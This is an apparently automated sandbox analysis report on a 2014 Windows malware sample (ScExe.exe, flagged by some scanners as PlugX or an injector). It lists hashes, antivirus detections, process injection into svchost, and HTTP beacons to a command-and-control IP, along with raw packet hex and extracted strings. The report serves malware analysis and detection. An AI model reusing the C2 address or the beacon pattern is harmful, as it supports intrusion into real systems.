Analysis Date2014-12-15 16:52:34
MD57e25069350d7844d723a0644ab1f7c75
SHA1285563e3979e980edaa454d8d378f784c42f0b8c

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: ef9927f7ae5ad4cd8b65d9fee42d5a1b sha1: 79632c1e33c9536f84da8a93a571a12a8e238dfd size: 25088
Section.rdata md5: 6874bb521841f4d556f1b88c10ed016c sha1: 42db7961d190052d163f8df8418db772cc0db5fa size: 122880
Section.data md5: df20a802e0857f3ecebbd12d191e1aed sha1: db5886a4ec8dd132c7853b952d757fd904269b1e size: 3584
Section.rsrc md5: ad5e2143aa4fcf8bdf1069daef347adc sha1: 074467381c7f37140def371c34187346c3735f8a size: 1024
Section.reloc md5: 90d72f199b0c8d48429ecf6a4f51c340 sha1: c914d7192350ea1ee37aaf004d0082ea41a38f4f size: 3584
Timestamp2014-09-22 15:31:03
VersionLegalCopyright: Copyright (C) 2014
InternalName: ScExe
FileVersion: 1, 0, 0, 1
ProductName: ScExe Application
ProductVersion: 1, 0, 0, 1
FileDescription: ScExe Application
OriginalFilename: ScExe.exe
PackerMicrosoft Visual C++ ?.?
PEhash7c32deac710b696be2d0ddf70eeefcc3ea52e138
IMPhashfc9c524063422845a4c42efc7820fea6
AV360 SafeGen:Win32.ExplorerHijack.ju0@a0iwokcb
AVAd-AwareGen:Win32.ExplorerHijack.ju0@a0iwokcb
AVAlwil (avast)no_virus
AVArcabit (arcavir)Gen:Win32.ExplorerHijack.ju0@a0iwokcb
AVAuthentiumno_virus
AVAvira (antivir)TR/Crypt.ZPACK.Gen4
AVBullGuardGen:Win32.ExplorerHijack.ju0@a0iwokcb
AVCA (E-Trust Ino)no_virus
AVCAT (quickheal)TrojanAPT.PlugX.E4
AVClamAVno_virus
AVDr. Webno_virus
AVEmsisoftGen:Win32.ExplorerHijack.ju0@a0iwokcb
AVEset (nod32)no_virus
AVFortinetno_virus
AVFrisk (f-prot)no_virus
AVF-SecureGen:Win32.ExplorerHijack.ju0@a0iwokcb
AVGrisoft (avg)no_virus
AVIkarusTrojan.Inject
AVK7no_virus
AVKasperskyTrojan-Dropper.Win32.Injector.kzrt
AVMalwareBytesno_virus
AVMcafeeRDN/Generic Dropper!vq
AVMicrosoft Security Essentialsno_virus
AVMicroWorld (escan)Gen:Win32.ExplorerHijack.ju0@a0iwokcb
AVRisingno_virus
AVSophosno_virus
AVSymantecTrojan.Gen.SMH
AVTrend Microno_virus
AVVirusBlokAda (vba32)no_virus

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates ProcessC:\WINDOWS\system32\svchost.exe

Process
↳ C:\WINDOWS\system32\svchost.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates FileC:\Documents and Settings\All Users\DRM\mcsync\kzqucedolaoac
Creates MutexGlobal\cwbhkksbxvwqp
Creates MutexGlobal\stodr
Creates MutexGlobal\oslgnyyol
Creates MutexGlobal\mxtia
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates MutexGlobal\oobscoiawverl
Creates MutexGlobal\kjjquuyddnjvy
Creates MutexGlobal\gcboa
Creates MutexGlobal\ordefamblbyvoxdzw
Creates MutexGlobal\ytyfipdwm
Creates Mutexc:!documents and settings!administrator!cookies!
Creates MutexGlobal\sxzfpnxmf
Creates MutexGlobal\aklrjsqho
Creates MutexGlobal\iwmvdlkwfalpkjxvz
Creates MutexGlobal\eqmrikmfucabncwuu
Creates MutexMy_Name
Creates MutexGlobal\welxlcdyczgarwjiy
Creates MutexGlobal\ooblq
Creates MutexGlobal\mbdlmpnpzvyvxjgfu
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates MutexGlobal\undqqwznr
Creates MutexGlobal\mybmyflgojpyy
Winsock DNS103.254.223.48

Network Details:

HTTP GEThttp://103.254.223.48:443/96C813865599BAF0109BDE9A
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; SV1)
HTTP GEThttp://103.254.223.48:443/146101DD15F5C5BFF9C02A1D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; SV1)
HTTP GEThttp://103.254.223.48:443/5ECD95013F011A4134B3F806
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; SV1)
HTTP GEThttp://103.254.223.48:443/738ACA101AD9B4312046E1F4
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; SV1)
HTTP GEThttp://103.254.223.48:443/519CA9EC8772797475AEA6CE
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; SV1)
Flows TCP192.168.1.1:1031 ➝ 103.254.223.48:443
Flows TCP192.168.1.1:1031 ➝ 103.254.223.48:443
Flows TCP192.168.1.1:1032 ➝ 103.254.223.48:443
Flows TCP192.168.1.1:1033 ➝ 103.254.223.48:443
Flows TCP192.168.1.1:1034 ➝ 103.254.223.48:443
Flows TCP192.168.1.1:1035 ➝ 103.254.223.48:443

Raw Pcap
0x00000000 (00000)   47455420 2f393643 38313338 36353539   GET /96C81386559
0x00000010 (00016)   39424146 30313039 42444539 41204854   9BAF0109BDE9A HT
0x00000020 (00032)   54502f31 2e310d0a 41636365 70743a20   TP/1.1..Accept: 
0x00000030 (00048)   2a2f2a0d 0a436f6f 6b69653a 20647a76   */*..Cookie: dzv
0x00000040 (00064)   6536646f 62762f49 41712f51 2f507063   e6dobv/IAq/Q/Ppc
0x00000050 (00080)   427a7351 4533726f 3d0d0a55 7365722d   BzsQE3ro=..User-
0x00000060 (00096)   4167656e 743a204d 6f7a696c 6c612f34   Agent: Mozilla/4
0x00000070 (00112)   2e302028 636f6d70 61746962 6c653b20   .0 (compatible; 
0x00000080 (00128)   4d534945 20362e30 3b205769 6e646f77   MSIE 6.0; Window
0x00000090 (00144)   73204e54 20352e31 3b202e4e 45542043   s NT 5.1; .NET C
0x000000a0 (00160)   4c522032 2e302e35 30373237 3b205356   LR 2.0.50727; SV
0x000000b0 (00176)   31290d0a 486f7374 3a203130 332e3235   1)..Host: 103.25
0x000000c0 (00192)   342e3232 332e3438 0d0a436f 6e6e6563   4.223.48..Connec
0x000000d0 (00208)   74696f6e 3a204b65 65702d41 6c697665   tion: Keep-Alive
0x000000e0 (00224)   0d0a4361 6368652d 436f6e74 726f6c3a   ..Cache-Control:
0x000000f0 (00240)   206e6f2d 63616368 650d0a0d 0a          no-cache....

0x00000000 (00000)   47455420 2f313436 31303144 44313546   GET /146101DD15F
0x00000010 (00016)   35433542 46463943 30324131 44204854   5C5BFF9C02A1D HT
0x00000020 (00032)   54502f31 2e310d0a 41636365 70743a20   TP/1.1..Accept: 
0x00000030 (00048)   2a2f2a0d 0a436f6f 6b69653a 20514d46   */*..Cookie: QMF
0x00000040 (00064)   39744457 635a3741 74667a6f 77304444   9tDWcZ7Atfzow0DD
0x00000050 (00080)   42563156 45793345 3d0d0a55 7365722d   BV1VEy3E=..User-
0x00000060 (00096)   4167656e 743a204d 6f7a696c 6c612f34   Agent: Mozilla/4
0x00000070 (00112)   2e302028 636f6d70 61746962 6c653b20   .0 (compatible; 
0x00000080 (00128)   4d534945 20362e30 3b205769 6e646f77   MSIE 6.0; Window
0x00000090 (00144)   73204e54 20352e31 3b202e4e 45542043   s NT 5.1; .NET C
0x000000a0 (00160)   4c522032 2e302e35 30373237 3b205356   LR 2.0.50727; SV
0x000000b0 (00176)   31290d0a 486f7374 3a203130 332e3235   1)..Host: 103.25
0x000000c0 (00192)   342e3232 332e3438 0d0a436f 6e6e6563   4.223.48..Connec
0x000000d0 (00208)   74696f6e 3a204b65 65702d41 6c697665   tion: Keep-Alive
0x000000e0 (00224)   0d0a4361 6368652d 436f6e74 726f6c3a   ..Cache-Control:
0x000000f0 (00240)   206e6f2d 63616368 650d0a0d 0a          no-cache....

0x00000000 (00000)   47455420 2f354543 44393530 31334630   GET /5ECD95013F0
0x00000010 (00016)   31314134 31333442 33463830 36204854   11A4134B3F806 HT
0x00000020 (00032)   54502f31 2e310d0a 41636365 70743a20   TP/1.1..Accept: 
0x00000030 (00048)   2a2f2a0d 0a436f6f 6b69653a 20326331   */*..Cookie: 2c1
0x00000040 (00064)   396e6f33 306f3831 346f424e 30332b51   9no30o814oBN03+Q
0x00000050 (00080)   395a7864 42394b77 3d0d0a55 7365722d   9ZxdB9Kw=..User-
0x00000060 (00096)   4167656e 743a204d 6f7a696c 6c612f34   Agent: Mozilla/4
0x00000070 (00112)   2e302028 636f6d70 61746962 6c653b20   .0 (compatible; 
0x00000080 (00128)   4d534945 20362e30 3b205769 6e646f77   MSIE 6.0; Window
0x00000090 (00144)   73204e54 20352e31 3b202e4e 45542043   s NT 5.1; .NET C
0x000000a0 (00160)   4c522032 2e302e35 30373237 3b205356   LR 2.0.50727; SV
0x000000b0 (00176)   31290d0a 486f7374 3a203130 332e3235   1)..Host: 103.25
0x000000c0 (00192)   342e3232 332e3438 0d0a436f 6e6e6563   4.223.48..Connec
0x000000d0 (00208)   74696f6e 3a204b65 65702d41 6c697665   tion: Keep-Alive
0x000000e0 (00224)   0d0a4361 6368652d 436f6e74 726f6c3a   ..Cache-Control:
0x000000f0 (00240)   206e6f2d 63616368 650d0a0d 0a          no-cache....

0x00000000 (00000)   47455420 2f373338 41434131 30314144   GET /738ACA101AD
0x00000010 (00016)   39423433 31323034 36453146 34204854   9B4312046E1F4 HT
0x00000020 (00032)   54502f31 2e310d0a 41636365 70743a20   TP/1.1..Accept: 
0x00000030 (00048)   2a2f2a0d 0a436f6f 6b69653a 2057754e   */*..Cookie: WuN
0x00000040 (00064)   32536676 5a466f6b 535a6c4c 4c327665   2SfvZFokSZlLL2ve
0x00000050 (00080)   6966334b 705a7245 3d0d0a55 7365722d   if3KpZrE=..User-
0x00000060 (00096)   4167656e 743a204d 6f7a696c 6c612f34   Agent: Mozilla/4
0x00000070 (00112)   2e302028 636f6d70 61746962 6c653b20   .0 (compatible; 
0x00000080 (00128)   4d534945 20362e30 3b205769 6e646f77   MSIE 6.0; Window
0x00000090 (00144)   73204e54 20352e31 3b202e4e 45542043   s NT 5.1; .NET C
0x000000a0 (00160)   4c522032 2e302e35 30373237 3b205356   LR 2.0.50727; SV
0x000000b0 (00176)   31290d0a 486f7374 3a203130 332e3235   1)..Host: 103.25
0x000000c0 (00192)   342e3232 332e3438 0d0a436f 6e6e6563   4.223.48..Connec
0x000000d0 (00208)   74696f6e 3a204b65 65702d41 6c697665   tion: Keep-Alive
0x000000e0 (00224)   0d0a4361 6368652d 436f6e74 726f6c3a   ..Cache-Control:
0x000000f0 (00240)   206e6f2d 63616368 650d0a0d 0a          no-cache....

0x00000000 (00000)   47455420 2f353139 43413945 43383737   GET /519CA9EC877
0x00000010 (00016)   32373937 34373541 45413643 45204854   2797475AEA6CE HT
0x00000020 (00032)   54502f31 2e310d0a 41636365 70743a20   TP/1.1..Accept: 
0x00000030 (00048)   2a2f2a0d 0a436f6f 6b69653a 20714146   */*..Cookie: qAF
0x00000040 (00064)   575a7251 67664632 744a5945 4e615172   WZrQgfF2tJYENaQr
0x00000050 (00080)   484d4956 79706367 3d0d0a55 7365722d   HMIVypcg=..User-
0x00000060 (00096)   4167656e 743a204d 6f7a696c 6c612f34   Agent: Mozilla/4
0x00000070 (00112)   2e302028 636f6d70 61746962 6c653b20   .0 (compatible; 
0x00000080 (00128)   4d534945 20362e30 3b205769 6e646f77   MSIE 6.0; Window
0x00000090 (00144)   73204e54 20352e31 3b202e4e 45542043   s NT 5.1; .NET C
0x000000a0 (00160)   4c522032 2e302e35 30373237 3b205356   LR 2.0.50727; SV
0x000000b0 (00176)   31290d0a 486f7374 3a203130 332e3235   1)..Host: 103.25
0x000000c0 (00192)   342e3232 332e3438 0d0a436f 6e6e6563   4.223.48..Connec
0x000000d0 (00208)   74696f6e 3a204b65 65702d41 6c697665   tion: Keep-Alive
0x000000e0 (00224)   0d0a4361 6368652d 436f6e74 726f6c3a   ..Cache-Control:
0x000000f0 (00240)   206e6f2d 63616368 650d0a0d 0a          no-cache....


Strings
fed
.CC
 
]
....
.
.
.
.
.
...
...
.M.
.
.
.
.
..

040904b0
1, 0, 0, 1
Copyright (C) 2014
FileDescription
FileVersion
                                 H
         (((((                  H
         h((((                  H
InternalName
KERNEL32.DLL
LegalCopyright
mscoree.dll
OriginalFilename
ProductName
ProductVersion
ScExe
ScExe Application
ScExe.exe
StringFileInfo
Translation
VarFileInfo
VS_VERSION_INFO
>!?:?{?
                          
0$0,040<0D0L0T0\0d0l0t0|0
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
: :$:(:,:0:4:8:<:@:D:H:L:P:T:X:\:`:d:h:l:p:t:x:|:
080=0^0c0
0A@@Ju
0SSSSS
0WWWWW
0X1g1v1
1 151<1P1W1o1{1
1/161<1N1V1a1
1&1n1v1
1)272=2M2R2j2p2
	12fh#
14TKlv
1%cz-8]
_2[_*[_&
2"2)262Y2n2
2EdsR>
"2Zto:
3080?0D0K0P0
3 3*333>3J3O3_3d3j3p3
3&3>3d3
3'4B4H4Q4X4z4
3H4X4h4x4
#4^5bU
'4d!2!hu
4;.Vj?
505L5U5[5d5i5x5
538A8G8a8f8u8~8
5%50595O5Z5t5
5%5)5/545:5?5N5d5o5t5
5$6)64696W6
596?6K6
5C5a5h5l5p5t5x5|5
5F6Q6l6s6x6|6
6[_:[_
64696G6Q6n6
6[g>[gR[
6R6X6i6
6T6X6`6d6
707P7l7p7
7 7j7p7t7x7|7
7+8E8h8u8
7Q7Z7f7
808P8p8
8C4;^Q
8#;@;l;
8N8T8`8
8O8h8o8w8|8
='=9=0>:>R>Y>c>k>x>
9+929<9f9t9z9
9!9+929F9M9S9a9h9m9v9
9^9d9h9l9p9
9Y9~I[
a6P7ise
AAFFf;
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
An application has made an attempt to load the C runtime library incorrectly.
- Attempt to initialize the CRT more than once.
- Attempt to use MSIL code from this assembly during native code initialization
August
a%Y])T
bbdTsb
bdW"cO
b eqb.
B(	HXN
bIW"bv
bjTd&/db
bkR(VH
Bowoux
{bpynw
BR{dqpo
{brznr
'c0['n
";"{Cb
"_[Cj3
)cN|tV
CorExitProcess
- CRT not initialized
C	Xs-ZXs-ZXs-ZQ
D[_:[_>
@.data
dddd, MMMM dd, yyyy
December
DecodePointer
DeleteCriticalSection
DOMAIN error
dwvwxR
ej%"S>
EncodePointer
EnterCriticalSection
equmqrf
equmwf
eru>ru
ExitProcess
ezgfvq
fbmObf
fd{bpy
fduor{
February
>F?K?P?U?e?
- floating point support not loaded
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
FreeEnvironmentStringsW
Friday
fwjB|*
[g6[gB[g
g6[g.[g:
[gB[g:[g
gb[gZ[gV
GetACP
GetActiveWindow
GetCommandLineW
GetCPInfo
GetCurrentProcess
GetCurrentProcessId
GetCurrentThreadId
GetEnvironmentStringsW
GetFileType
GetLastActivePopup
GetLastError
GetLocaleInfoA
GetModuleFileNameA
GetModuleFileNameW
GetModuleHandleW
GetOEMCP
GetProcAddress
GetProcessWindowStation
GetStartupInfoA
GetStartupInfoW
GetStdHandle
GetStringTypeA
GetStringTypeW
GetSystemTime
GetSystemTimeAsFileTime
GetTickCount
GetUserObjectInformationA
gF[gR[gZ
[g*"[g2
g&[g2[g:
g*[g&[g.
g.[g&[g2
"[g*[gN[
g:hzvS
gJ[gF[gNV['
[gR[gF
HeapAlloc
HeapCreate
HeapFree
HeapReAlloc
HeapSize
HH:mm:ss
HvcqxZ
h"ZH"ZM
ierd{pfx
ierrqfx
InitializeCriticalSectionAndSpinCount
InterlockedDecrement
InterlockedIncrement
IsDebuggerPresent
IsValidCodePage
:I;T;^;o;z;
JanFebMarAprMayJunJulAugSepOctNovDec
January
j(dA	f
j hxWB
j@j ^V
jXh@VB
KERNEL32.dll
LCMapStringA
LCMapStringW
LeaveCriticalSection
LoadLibraryA
;m;2<\<
MessageBoxA
Microsoft Visual C++ Runtime Library
MM/dd/yy
m/Oe|x
Monday
MultiByteToWideChar
MU#~MM
#M"]"x#]
nefdur
nnqubTcU
- not enough space for arguments
- not enough space for environment
- not enough space for locale information
- not enough space for lowio initialization
- not enough space for _onexit/atexit table
- not enough space for stdio initialization
- not enough space for thread data
November
Ob2=zO@?
October
Of-|E@
)/oOxXMd
o:qhwK
OWj%bcb
pbfwdx
ph{dqpo
Please contact the application's support team for more information.
p:mUu~
PPPPPPPP
Program: 
<program name unknown>
puqvwde
- pure virtual function call
"PwydRhv
qgduwe
QQSVWh
QRFL-"
QueryPerformanceCounter
qybywv
`.rdata
@.reloc
"RG~WLy
RtlUnwind
runtime error 
Runtime Error!
Saturday
September
SetHandleCount
SetLastError
SetUnhandledExceptionFilter
&sF[W(
sgwpuk
SING error
SleepEx
Sunday
SunMonTueWedThuFriSat
T${_^3
teha#@
TerminateProcess
This application has requested the Runtime to terminate it in an unusual way.
This indicates a bug in your application.
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
!This program cannot be run in DOS mode.
Thursday
T${j@h
TLOSS error
TlsAlloc
TlsFree
TlsGetValue
TlsSetValue
t"SS9]
Tuesday
;t$,v-
t+WWVPV
uBhZ @
ud{rf<q
- unable to initialize heap
- unable to open console device
uN"C<^
- unexpected heap error
- unexpected multithread lock error
UnhandledExceptionFilter
UQPXY]Y[
URPQQh8Q@
USER32.DLL
uweewe
VCbuUw
VirtualAlloc
VirtualFree
v	N+D$
vvdwee
;vXVVV
VZ[s-ZXs,Z
wbee{qp
w<d6%W
wdxqdo
Wednesday
wemfqr
W"gZM@b
Wh"TO@#
WideCharToMultiByte
wk=Cy2}
wnwf$w
wourkd
WriteFile
wroqdk
=.=W=\=s=
wsgwef
<xf9^W
xJvgxU
x[W*[rU*
---x-xM
<=<Y<|<
>=Yt1j
ywfzqbeftkp
yzRbvl
ZAs-ZQ
zgfvqi
ZHs-ZQ
zoryJ"
ZYs-ZQ
ZYs-ZRichXs-Z
ZZs-ZF!